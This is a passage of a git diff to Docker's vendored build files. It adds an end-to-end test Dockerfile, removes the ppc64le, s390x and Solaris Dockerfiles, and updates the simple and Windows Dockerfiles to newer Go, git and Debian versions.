-COPY hack/dockerfile/binaries-commits /tmp/binaries-commits
-COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh
-RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy
-
-ENTRYPOINT ["hack/dind"]
-
-# Upload docker source
-COPY . /go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.e2e b/vendor/github.com/docker/docker/Dockerfile.e2e
new file mode 100644
index 0000000000..663a58af33
--- /dev/null
+++ b/vendor/github.com/docker/docker/Dockerfile.e2e
@@ -0,0 +1,74 @@
+## Step 1: Build tests
+FROM golang:1.10.3-alpine3.7 as builder
+
+RUN apk add --update \
+    bash \
+    btrfs-progs-dev \
+    build-base \
+    curl \
+    lvm2-dev \
+    jq \
+    && rm -rf /var/cache/apk/*
+
+RUN mkdir -p /go/src/github.com/docker/docker/
+WORKDIR /go/src/github.com/docker/docker/
+
+# Generate frozen images
+COPY contrib/download-frozen-image-v2.sh contrib/download-frozen-image-v2.sh
+RUN contrib/download-frozen-image-v2.sh /output/docker-frozen-images \
+	buildpack-deps:jessie@sha256:dd86dced7c9cd2a724e779730f0a53f93b7ef42228d4344b25ce9a42a1486251 \
+	busybox:latest@sha256:bbc3a03235220b170ba48a157dd097dd1379299370e1ed99ce976df0355d24f0 \
+	busybox:glibc@sha256:0b55a30394294ab23b9afd58fab94e61a923f5834fba7ddbae7f8e0c11ba85e6 \
+	debian:jessie@sha256:287a20c5f73087ab406e6b364833e3fb7b3ae63ca0eb3486555dc27ed32c6e60 \
+	hello-world:latest@sha256:be0cd392e45be79ffeffa6b05338b98ebb16c87b255f48e297ec7f98e123905c
+
+# Install dockercli
+# Please edit hack/dockerfile/install/<name>.installer to update them.
+COPY hack/dockerfile/install hack/dockerfile/install
+RUN ./hack/dockerfile/install/install.sh dockercli
+
+# Set tag and add sources
+ARG DOCKER_GITCOMMIT
+ENV DOCKER_GITCOMMIT=${DOCKER_GITCOMMIT:-undefined}
+ADD . .
+
+# Build DockerSuite.TestBuild* dependency
+RUN CGO_ENABLED=0 go build -buildmode=pie -o /output/httpserver github.com/docker/docker/contrib/httpserver
+
+# Build the integration tests and copy the resulting binaries to /output/tests
+RUN hack/make.sh build-integration-test-binary
+RUN mkdir -p /output/tests && find . -name test.main -exec cp --parents '{}' /output/tests \;
+
+## Step 2: Generate testing image
+FROM alpine:3.7 as runner
+
+# GNU tar is used for generating the emptyfs image
+RUN apk add --update \
+    bash \
+    ca-certificates \
+    g++ \
+    git \
+    iptables \
+    pigz \
+    tar \
+    xz \
+    && rm -rf /var/cache/apk/*
+
+# Add an unprivileged user to be used for tests which need it
+RUN addgroup docker && adduser -D -G docker unprivilegeduser -s /bin/ash
+
+COPY contrib/httpserver/Dockerfile /tests/contrib/httpserver/Dockerfile
+COPY contrib/syscall-test /tests/contrib/syscall-test
+COPY integration-cli/fixtures /tests/integration-cli/fixtures
+
+COPY hack/test/e2e-run.sh /scripts/run.sh
+COPY hack/make/.ensure-emptyfs /scripts/ensure-emptyfs.sh
+
+COPY --from=builder /output/docker-frozen-images /docker-frozen-images
+COPY --from=builder /output/httpserver /tests/contrib/httpserver/httpserver
+COPY --from=builder /output/tests /tests
+COPY --from=builder /usr/local/bin/docker /usr/bin/docker
+
+ENV DOCKER_REMOTE_DAEMON=1 DOCKER_INTEGRATION_DAEMON_DEST=/
+
+ENTRYPOINT ["/scripts/run.sh"]
diff --git a/vendor/github.com/docker/docker/Dockerfile.ppc64le b/vendor/github.com/docker/docker/Dockerfile.ppc64le
deleted file mode 100644
index 1f9f5006ff..0000000000
--- a/vendor/github.com/docker/docker/Dockerfile.ppc64le
+++ /dev/null
@@ -1,188 +0,0 @@
-# This file describes the standard way to build Docker on ppc64le, using docker
-#
-# Usage:
-#
-# # Assemble the full dev environment. This is slow the first time.
-# docker build -t docker -f Dockerfile.ppc64le .
-#
-# # Mount your source in an interactive container for quick testing:
-# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash
-#
-# # Run the test suite:
-# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py
-#
-# Note: AppArmor used to mess with privileged mode, but this is no longer
-# the case. Therefore, you don't have to disable it anymore.
-#
-
-FROM ppc64le/debian:jessie
-
-# allow replacing httpredir or deb mirror
-ARG APT_MIRROR=deb.debian.org
-RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
-
-# Packaged dependencies
-RUN apt-get update && apt-get install -y \
-	apparmor \
-	aufs-tools \
-	automake \
-	bash-completion \
-	btrfs-tools \
-	build-essential \
-	cmake \
-	createrepo \
-	curl \
-	dpkg-sig \
-	git \
-	iptables \
-	jq \
-	net-tools \
-	libapparmor-dev \
-	libcap-dev \
-	libltdl-dev \
-	libsqlite3-dev \
-	libsystemd-journal-dev \
-	libtool \
-	mercurial \
-	pkg-config \
-	python-dev \
-	python-mock \
-	python-pip \
-	python-websocket \
-	xfsprogs \
-	tar \
-	vim-common \
-	--no-install-recommends
-
-# Get lvm2 source for compiling statically
-ENV LVM2_VERSION 2.02.103
-RUN mkdir -p /usr/local/lvm2 \
-	&& curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \
-		| tar -xzC /usr/local/lvm2 --strip-components=1
-# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags
-
-# Fix platform enablement in lvm2 to support ppc64le properly
-RUN set -e \
-	&& for f in config.guess config.sub; do \
-		curl -fsSL -o "/usr/local/lvm2/autoconf/$f" "http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=$f;hb=HEAD"; \
-	done
-# "arch.c:78:2: error: #error the arch code needs to know about your machine type"
-
-# Compile and install lvm2
-RUN cd /usr/local/lvm2 \
-	&& ./configure \
-		--build="$(gcc -print-multiarch)" \
-		--enable-static_link \
-	&& make device-mapper \
-	&& make install_device-mapper
-# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL
-
-# Install seccomp: the version shipped in jessie is too old
-ENV SECCOMP_VERSION 2.3.1
-RUN set -x \
-        && export SECCOMP_PATH="$(mktemp -d)" \
-        && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \
-                | tar -xzC "$SECCOMP_PATH" --strip-components=1 \
-        && ( \
-                cd "$SECCOMP_PATH" \
-                && ./configure --prefix=/usr/local \
-                && make \
-                && make install \
-                && ldconfig \
-        ) \
-        && rm -rf "$SECCOMP_PATH"
-
-
-# Install Go
-# NOTE: official ppc64le go binaries weren't available until go 1.6.4 and 1.7.4
-ENV GO_VERSION 1.7.5
-RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" \
-	| tar -xzC /usr/local
-
-ENV PATH /go/bin:/usr/local/go/bin:$PATH
-ENV GOPATH /go
-
-# Dependency for golint
-ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3
-RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \
-	&& (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT)
-
-# Grab Go's lint tool
-ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456
-RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \
-	&& (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \
-	&& go install -v github.com/golang/lint/golint
-
-# Install two versions of the registry. The first is an older version that
-# only supports schema1 manifests. The second is a newer version that supports
-# both. This allows integration-cli tests to cover push/pull with both schema1
-# and schema2 manifests.
-ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd
-ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827
-RUN set -x \
-	&& export GOPATH="$(mktemp -d)" \
-	&& git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \
-	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \
-	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
-		go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \
-	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \
-	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
-		go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \
-	&& rm -rf "$GOPATH"
-
-# Install notary and notary-server
-ENV NOTARY_VERSION v0.4.2
-RUN set -x \
-	&& export GOPATH="$(mktemp -d)" \
-	&& git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \
-	&& (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \
-	&& GOPATH="$GOPATH/src/github.com/docker/notary/Godeps/_workspace:$GOPATH" \
-		go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \
-	&& GOPATH="$GOPATH/src/github.com/docker/notary/Godeps/_workspace:$GOPATH" \
-		go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \
-	&& rm -rf "$GOPATH"
-
-# Get the "docker-py" source so we can run their integration tests
-ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324
-RUN git clone https://github.com/docker/docker-py.git /docker-py \
-	&& cd /docker-py \
-	&& git checkout -q $DOCKER_PY_COMMIT \
-	&& pip install -r test-requirements.txt
-
-# Set user.email so crosbymichael's in-container merge commits go smoothly
-RUN git config --global user.email 'docker-dummy@example.com'
-
-# Add an unprivileged user to be used for tests which need it
-RUN groupadd -r docker
-RUN useradd --create-home --gid docker unprivilegeduser
-
-VOLUME /var/lib/docker
-WORKDIR /go/src/github.com/docker/docker
-ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
-
-# Let us use a .bashrc file
-RUN ln -sfv $PWD/.bashrc ~/.bashrc
-
-# Register Docker's bash completion.
-RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker
-
-# Get useful and necessary Hub images so we can "docker load" locally instead of pulling
-COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/
-RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \
-	ppc64le/buildpack-deps:jessie@sha256:902bfe4ef1389f94d143d64516dd50a2de75bca2e66d4a44b1d73f63ddf05dda \
-	ppc64le/busybox:latest@sha256:38bb82085248d5a3c24bd7a5dc146f2f2c191e189da0441f1c2ca560e3fc6f1b \
-	ppc64le/debian:jessie@sha256:412845f51b6ab662afba71bc7a716e20fdb9b84f185d180d4c7504f8a75c4f91 \
-	ppc64le/hello-world:latest@sha256:186a40a9a02ca26df0b6c8acdfb8ac2f3ae6678996a838f977e57fac9d963974
-# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is)
-
-# Install tomlv, vndr, runc, containerd, tini, docker-proxy
-# Please edit hack/dockerfile/install-binaries.sh to update them.
-COPY hack/dockerfile/binaries-commits /tmp/binaries-commits
-COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh
-RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy
-
-# Wrap all commands in the "docker-in-docker" script to allow nested containers
-ENTRYPOINT ["hack/dind"]
-
-# Upload docker source
-COPY . /go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.s390x b/vendor/github.com/docker/docker/Dockerfile.s390x
deleted file mode 100644
index ba94bc70aa..0000000000
--- a/vendor/github.com/docker/docker/Dockerfile.s390x
+++ /dev/null
@@ -1,190 +0,0 @@
-# This file describes the standard way to build Docker on s390x, using docker
-#
-# Usage:
-#
-# # Assemble the full dev environment. This is slow the first time.
-# docker build -t docker -f Dockerfile.s390x .
-#
-# # Mount your source in an interactive container for quick testing:
-# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash
-#
-# # Run the test suite:
-# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py
-#
-# Note: AppArmor used to mess with privileged mode, but this is no longer
-# the case. Therefore, you don't have to disable it anymore.
-#
-
-FROM s390x/gcc:6.1
-
-# Packaged dependencies
-RUN apt-get update && apt-get install -y \
-	apparmor \
-	aufs-tools \
-	automake \
-	bash-completion \
-	btrfs-tools \
-	build-essential \
-	cmake \
-	createrepo \
-	curl \
-	dpkg-sig \
-	git \
-	iptables \
-	jq \
-	net-tools \
-	libapparmor-dev \
-	libcap-dev \
-	libltdl-dev \
-	libsqlite3-dev \
-	libsystemd-journal-dev \
-	libtool \
-	mercurial \
-	pkg-config \
-	python-dev \
-	python-mock \
-	python-pip \
-	python-websocket \
-	xfsprogs \
-	tar \
-	vim-common \
-	--no-install-recommends
-
-# glibc in Debian has a bug specific to s390x that won't be fixed until Debian 8.6 is released
-# - https://github.com/docker/docker/issues/24748
-# - https://sourceware.org/git/?p=glibc.git;a=commit;h=890b7a4b33d482b5c768ab47d70758b80227e9bc
-# - https://sourceware.org/git/?p=glibc.git;a=commit;h=2e807f29595eb5b1e5d0decc6e356a3562ecc58e
-RUN echo 'deb http://httpredir.debian.org/debian jessie-proposed-updates main' >> /etc/apt/sources.list.d/pu.list \
-	&& apt-get update \
-	&& apt-get install -y libc6 \
-	&& rm -rf /var/lib/apt/lists/*
-
-# Install seccomp: the version shipped in jessie is too old
-ENV SECCOMP_VERSION 2.3.1
-RUN set -x \
-	&& export SECCOMP_PATH="$(mktemp -d)" \
-	&& curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \
-		| tar -xzC "$SECCOMP_PATH" --strip-components=1 \
-	&& ( \
-		cd "$SECCOMP_PATH" \
-		&& ./configure --prefix=/usr/local \
-		&& make \
-		&& make install \
-		&& ldconfig \
-	) \
-	&& rm -rf "$SECCOMP_PATH"
-
-# Get lvm2 source for compiling statically
-ENV LVM2_VERSION 2.02.103
-RUN mkdir -p /usr/local/lvm2 \
-	&& curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \
-		| tar -xzC /usr/local/lvm2 --strip-components=1
-# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags
-
-# Fix platform enablement in lvm2 to support s390x properly
-RUN set -e \
-	&& for f in config.guess config.sub; do \
-		curl -fsSL -o "/usr/local/lvm2/autoconf/$f" "http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=$f;hb=HEAD"; \
-	done
-# "arch.c:78:2: error: #error the arch code needs to know about your machine type"
-
-# Compile and install lvm2
-RUN cd /usr/local/lvm2 \
-	&& ./configure \
-		--build="$(gcc -print-multiarch)" \
-		--enable-static_link \
-	&& make device-mapper \
-	&& make install_device-mapper
-# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL
-
-ENV GO_VERSION 1.7.5
-RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" \
-	| tar -xzC /usr/local
-
-ENV PATH /go/bin:/usr/local/go/bin:$PATH
-ENV GOPATH /go
-
-# Dependency for golint
-ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3
-RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \
-	&& (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT)
-
-# Grab Go's lint tool
-ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456
-RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \
-	&& (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \
-	&& go install -v github.com/golang/lint/golint
-
-# Install two versions of the registry. The first is an older version that
-# only supports schema1 manifests. The second is a newer version that supports
-# both. This allows integration-cli tests to cover push/pull with both schema1
-# and schema2 manifests.
-ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd
-ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827
-RUN set -x \
-	&& export GOPATH="$(mktemp -d)" \
-	&& git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \
-	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \
-	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
-		go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \
-	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \
-	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
-		go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \
-	&& rm -rf "$GOPATH"
-
-# Install notary and notary-server
-ENV NOTARY_VERSION v0.4.2
-RUN set -x \
-	&& export GOPATH="$(mktemp -d)" \
-	&& git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \
-	&& (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \
-	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
-		go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \
-	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
-		go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \
-	&& rm -rf "$GOPATH"
-
-# Get the "docker-py" source so we can run their integration tests
-ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324
-RUN git clone https://github.com/docker/docker-py.git /docker-py \
-	&& cd /docker-py \
-	&& git checkout -q $DOCKER_PY_COMMIT \
-	&& pip install -r test-requirements.txt
-
-# Set user.email so crosbymichael's in-container merge commits go smoothly
-RUN git config --global user.email 'docker-dummy@example.com'
-
-# Add an unprivileged user to be used for tests which need it
-RUN groupadd -r docker
-RUN useradd --create-home --gid docker unprivilegeduser
-
-VOLUME /var/lib/docker
-WORKDIR /go/src/github.com/docker/docker
-ENV DOCKER_BUILDTAGS apparmor selinux seccomp
-
-# Let us use a .bashrc file
-RUN ln -sfv $PWD/.bashrc ~/.bashrc
-
-# Register Docker's bash completion.
-RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker
-
-# Get useful and necessary Hub images so we can "docker load" locally instead of pulling
-COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/
-RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \
-	s390x/buildpack-deps:jessie@sha256:4d1381224acaca6c4bfe3604de3af6972083a8558a99672cb6989c7541780099 \
-	s390x/busybox:latest@sha256:dd61522c983884a66ed72d60301925889028c6d2d5e0220a8fe1d9b4c6a4f01b \
-	s390x/debian:jessie@sha256:b74c863400909eff3c5e196cac9bfd1f6333ce47aae6a38398d87d5875da170a \
-	s390x/hello-world:latest@sha256:780d80b3a7677c3788c0d5cd9168281320c8d4a6d9183892d8ee5cdd610f5699
-# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is)
-
-# Install tomlv, vndr, runc, containerd, tini, docker-proxy
-# Please edit hack/dockerfile/install-binaries.sh to update them.
-COPY hack/dockerfile/binaries-commits /tmp/binaries-commits
-COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh
-RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy
-
-# Wrap all commands in the "docker-in-docker" script to allow nested containers
-ENTRYPOINT ["hack/dind"]
-
-# Upload docker source
-COPY . /go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.simple b/vendor/github.com/docker/docker/Dockerfile.simple
index 8eeb3d96bb..b0338ac0c8 100644
--- a/vendor/github.com/docker/docker/Dockerfile.simple
+++ b/vendor/github.com/docker/docker/Dockerfile.simple
@@ -1,11 +1,11 @@
 # docker build -t docker:simple -f Dockerfile.simple .
 # docker run --rm docker:simple hack/make.sh dynbinary
 # docker run --rm --privileged docker:simple hack/dind hack/make.sh test-unit
-# docker run --rm --privileged -v /var/lib/docker docker:simple hack/dind hack/make.sh dynbinary test-integration-cli
+# docker run --rm --privileged -v /var/lib/docker docker:simple hack/dind hack/make.sh dynbinary test-integration
 
 # This represents the bare minimum required to build and test Docker.
 
-FROM debian:jessie
+FROM debian:stretch
 
 # allow replacing httpredir or deb mirror
 ARG APT_MIRROR=deb.debian.org
@@ -23,11 +23,12 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
 		git \
 		libapparmor-dev \
 		libdevmapper-dev \
-		libsqlite3-dev \
-		\
+		libseccomp-dev \
 		ca-certificates \
 		e2fsprogs \
 		iptables \
+		pkg-config \
+		pigz \
 		procps \
 		xfsprogs \
 		xz-utils \
@@ -36,26 +37,12 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
 		vim-common \
 	&& rm -rf /var/lib/apt/lists/*
 
-# Install seccomp: the version shipped in trusty is too old
-ENV SECCOMP_VERSION 2.3.1
-RUN set -x \
-	&& export SECCOMP_PATH="$(mktemp -d)" \
-	&& curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \
-		| tar -xzC "$SECCOMP_PATH" --strip-components=1 \
-	&& ( \
-		cd "$SECCOMP_PATH" \
-		&& ./configure --prefix=/usr/local \
-		&& make \
-		&& make install \
-		&& ldconfig \
-	) \
-	&& rm -rf "$SECCOMP_PATH"
-
 # Install Go
 # IMPORTANT: If the version of Go is updated, the Windows to Linux CI machines
 #            will need updating, to avoid errors. Ping #docker-maintainers on IRC
 #            with a heads-up.
-ENV GO_VERSION 1.7.5
+# IMPORTANT: When updating this please note that stdlib archive/tar pkg is vendored
+ENV GO_VERSION 1.10.3
 RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" \
 	| tar -xzC /usr/local
 ENV PATH /go/bin:/usr/local/go/bin:$PATH
@@ -63,10 +50,12 @@ ENV GOPATH /go
 ENV CGO_LDFLAGS -L/lib
 
 # Install runc, containerd, tini and docker-proxy
-# Please edit hack/dockerfile/install-binaries.sh to update them.
-COPY hack/dockerfile/binaries-commits /tmp/binaries-commits
-COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh
-RUN /tmp/install-binaries.sh runc containerd tini proxy
+# Please edit hack/dockerfile/install/<name>.installer to update them.
+COPY hack/dockerfile/install hack/dockerfile/install
+RUN for i in runc containerd tini proxy dockercli; \
+		do hack/dockerfile/install/install.sh $i; \
+	done
+ENV PATH=/usr/local/cli:$PATH
 
 ENV AUTO_GOPATH 1
 WORKDIR /usr/src/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.solaris b/vendor/github.com/docker/docker/Dockerfile.solaris
deleted file mode 100644
index bb342e5e6a..0000000000
--- a/vendor/github.com/docker/docker/Dockerfile.solaris
+++ /dev/null
@@ -1,20 +0,0 @@
-# Defines an image that hosts a native Docker build environment for Solaris
-# TODO: Improve stub
-
-FROM solaris:latest
-
-# compile and runtime deps
-RUN pkg install --accept \
-		git \
-		gnu-coreutils \
-		gnu-make \
-		gnu-tar \
-		diagnostic/top \
-		golang \
-		library/golang/* \
-		developer/gcc-*
-
-ENV GOPATH /go/:/usr/lib/gocode/1.5/
-ENV DOCKER_CROSSPLATFORMS solaris/amd64
-WORKDIR /go/src/github.com/docker/docker
-COPY . /go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.windows b/vendor/github.com/docker/docker/Dockerfile.windows
index 652d07275e..1b2c1f3c8a 100644
--- a/vendor/github.com/docker/docker/Dockerfile.windows
+++ b/vendor/github.com/docker/docker/Dockerfile.windows
@@ -71,8 +71,9 @@
 #
 # 4. Build the docker executable binaries by running one of the following:
 #
-#    >>   docker run --name binaries nativebuildimage hack\make.ps1 -Binary
-#    >>   docker run --name binaries -m 2GB nativebuildimage hack\make.ps1 -Binary    (if using Hyper-V containers)
+#    >>   $DOCKER_GITCOMMIT=(git rev-parse --short HEAD)
+#    >>   docker run --name binaries -e DOCKER_GITCOMMIT=$DOCKER_GITCOMMIT nativebuildimage hack\make.ps1 -Binary
+#    >>   docker run --name binaries -e DOCKER_GITCOMMIT=$DOCKER_GITCOMMIT -m 2GB nativebuildimage hack\make.ps1 -Binary    (if using Hyper-V containers)
 #
 #
 # 5. Copy the binaries out of the container, replacing HostPath with an appropriate destination 
@@ -98,19 +99,14 @@
 # -----------------------------------------------------------------------------------------
 
 
-#  The validation tests can either run in a container, or directly on the host. To run in a
-#  container, ensure you have created the nativebuildimage above. Then run one of the
-#  following from an (elevated) Windows PowerShell prompt:
-#
-#    >>   docker run --rm nativebuildimage hack\make.ps1 -DCO -PkgImports -GoFormat
-#    >>   docker run --rm -m 2GB nativebuildimage hack\make.ps1 -DCO -PkgImports -GoFormat    (if using Hyper-V containers)
-
-# To run the validation tests on the host, from the root of the repository, run the
-# following from a Windows PowerShell prompt (elevation is not required): (Note Go
-# must be installed to run these tests)
+#  The validation tests can only run directly on the host. This is because they calculate
+#  information from the git repo, but the .git directory is not passed into the image as
+#  it is excluded via .dockerignore. Run the following from a Windows PowerShell prompt
+#  (elevation is not required): (Note Go must be installed to run these tests)
 #
 #    >>   hack\make.ps1 -DCO -PkgImports -GoFormat
 
+
 # -----------------------------------------------------------------------------------------
 
 
@@ -124,7 +120,7 @@
 # -----------------------------------------------------------------------------------------
 
 
-#  To run all tests and binary build, ensure you have created the nativebuildimage above. Then 
+#  To run unit tests and binary build, ensure you have created the nativebuildimage above. Then 
 #  run one of the following from an (elevated) Windows PowerShell prompt:
 #
 #    >>   docker run nativebuildimage hack\make.ps1 -All
@@ -136,8 +132,8 @@
 # Important notes:
 # ---------------
 #
-# Don't attempt to use a bind-mount to pass a local directory as the bundles target
-# directory. It does not work (golang attempts for follow a mapped folder incorrectly). 
+# Don't attempt to use a bind mount to pass a local directory as the bundles target
+# directory. It does not work (golang attempts for follow a mapped folder incorrectly).
 # Instead, use docker cp as per the example.
 #
 # go.zip is not removed from the image as it is used by the Windows CI servers
@@ -160,20 +156,17 @@
 FROM microsoft/windowsservercore
 
 # Use PowerShell as the default shell
-SHELL ["powershell", "-command"]
+SHELL ["powershell", "-Command", "$ErrorActionPreference = 'Stop'; $ProgressPreference = 'SilentlyContinue';"]
 
 # Environment variable notes:
 #  - GO_VERSION must be consistent with 'Dockerfile' used by Linux.
 #  - FROM_DOCKERFILE is used for detection of building within a container.
-ENV GO_VERSION=1.7.5 `
-    GIT_VERSION=2.11.0 `
+ENV GO_VERSION=1.10.3 `
+    GIT_VERSION=2.11.1 `
     GOPATH=C:\go `
     FROM_DOCKERFILE=1
 
 RUN `
-  $ErrorActionPreference = 'Stop'; `
-  $ProgressPreference = 'SilentlyContinue'; `
-  `
   Function Test-Nano() { `
     $EditionId = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name 'EditionID').EditionId; `
     return (($EditionId -eq 'ServerStandardNano') -or ($EditionId -eq 'ServerDataCenterNano') -or ($EditionId -eq 'NanoServer')); `
@@ -205,11 +198,11 @@ RUN `
     } `
   } `
   `
-  setx /M PATH $('C:\git\bin;C:\git\usr\bin;'+$Env:PATH+';C:\gcc\bin;C:\go\bin'); `
+  setx /M PATH $('C:\git\cmd;C:\git\usr\bin;'+$Env:PATH+';C:\gcc\bin;C:\go\bin'); `
   `
   Write-Host INFO: Downloading git...; `
-  $location='https://github.com/git-for-windows/git/releases/download/v'+$env:GIT_VERSION+'.windows.1/PortableGit-'+$env:GIT_VERSION+'-64-bit.7z.exe'; `
-  Download-File $location C:\gitsetup.7z.exe; `
+  $location='https://www.nuget.org/api/v2/package/GitForWindows/'+$Env:GIT_VERSION; `
+  Download-File $location C:\gitsetup.zip; `
   `
   Write-Host INFO: Downloading go...; `
   Download-File $('https://golang.org/dl/go'+$Env:GO_VERSION+'.windows-amd64.zip') C:\go.zip; `
@@ -223,15 +216,11 @@ RUN `
   Write-Host INFO: Downloading compiler 3 of 3...; `
   Download-File https://raw.githubusercontent.com/jhowardmsft/docker-tdmgcc/master/binutils.zip C:\binutils.zip; `
   `
-  Write-Host INFO: Installing PS7Zip package...; `
-  Install-Package PS7Zip -Force | Out-Null; `
-  Write-Host INFO: Importing PS7Zip...; `
-  Import-Module PS7Zip -Force; `
-  New-Item C:\git -ItemType Directory | Out-Null ; `
-  cd C:\git; `
   Write-Host INFO: Extracting git...; `
-  Expand-7Zip C:\gitsetup.7z.exe | Out-Null; `
-  cd C:\; `
+  Expand-Archive C:\gitsetup.zip C:\git-tmp; `
+  New-Item -Type Directory C:\git | Out-Null; `
+  Move-Item C:\git-tmp\tools\* C:\git\.; `
+  Remove-Item -Recurse -Force C:\git-tmp; `
   `
   Write-Host INFO: Expanding go...; `
   Expand-Archive C:\go.zip -DestinationPath C:\; `
@@ -247,13 +236,13 @@ RUN `
   Remove-Item C:\gcc.zip; `
   Remove-Item C:\runtime.zip; `
   Remove-Item C:\binutils.zip; `
-  Remove-Item C:\gitsetup.7z.exe; `
+  Remove-Item C:\gitsetup.zip; `
   `
   Write-Host INFO: Creating source directory...; `
   New-Item -ItemType Directory -Path C:\go\src\github.com\docker\docker | Out-Null; `
   `
   Write-Host INFO: Configuring git core.autocrlf...; `
-  C:\git\bin\git config --global core.autocrlf true; `
+  C:\git\cmd\git config --global core.autocrlf true; `
   `
   Write-Host INFO: Completed
 
